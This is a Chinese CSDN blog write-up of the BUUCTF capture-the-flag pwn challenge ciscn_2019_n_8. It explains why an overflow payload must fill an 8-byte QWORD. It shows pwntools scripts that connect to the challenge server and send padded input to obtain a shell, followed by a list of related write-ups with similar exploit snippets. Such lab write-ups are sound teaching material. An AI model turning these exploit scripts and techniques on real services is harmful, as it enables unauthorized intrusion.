[BUUCTF-pwn]——ciscn_2019_n_8

最新推荐文章于 2024-07-05 00:19:02 发布
最新推荐文章于 2024-07-05 00:19:02 发布
阅读量2k 收藏 1
点赞数 3
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113784489
版权
本文详细介绍了如何解决一个CTF中的缓冲区溢出问题,涉及到了64位环境下地址的正确表示。在原始exploit中,由于对QWORD的理解错误,导致尝试失败。通过修正,使用p64()或两个p32()来正确填充8字节的地址,最终成功交互。该过程展示了对内存管理和指针理解的重要性。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——ciscn_2019_n_8

  • 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8
  • 题目
    在这里插入图片描述
    上去checksec一下,吓一跳保护基本全开了。在这里插入图片描述
    在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下:

在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p32(0x11))
p.interactive()

发现不可以, 点不开 _QWORD 就去百度了一下
qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节
所以expoit改下应该为

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p64(0x11)) # 32对应4个字节, 64对应8个字节
p.interactive()

或者

from pwn import *
p = remote("node3.buuoj.cn",29772)
p.sendline("aaaa"*13 + p32(0x11) + p32(0)) # 32对应4个字节, 64对应8个字节
p.interactive()
Y-peak
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 554
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2621
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
BUUCTF-PWN】9-ciscn_2019_n_8
最新发布
燕麦葡萄干的博客
07-05 323
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
BUUCTF - PWNciscn_2019_n_8
古月浪子的博客
03-27 1149
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 224
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 239
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
buuctf pwn ciscn_2019_n_8
zip471642048的博客
06-21 365
checksec 看一下基本信息 把程序拖到ida32分析一波,可以看到 读入字符串给了 var 然后后面的v4,v5没起作用,然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 265
一道通过Checksec让没看源代码的你觉得难度很高的题。
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4072
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 378
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 454
[buuctf]ciscn_2019_n_8
buuctf ciscn_2019_n_8
carol2358的博客
04-15 276
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 518
两个方法解题
BUUCTF-Pwn-ciscn_2019_n_8
餐桌上的猫
02-15 268
题目截图 检查文件信息,开了NX,Canary和PIE 反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节 exp from pwn import* r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17) r.sendlineafter(b'\n', payload) r.interactive() #开启交互
BUUCTF pwn——ciscn_2019_n_8
CNS-Enterprise BCC-1701-J
03-15 177
BUUCTF 做题练习
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2278
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值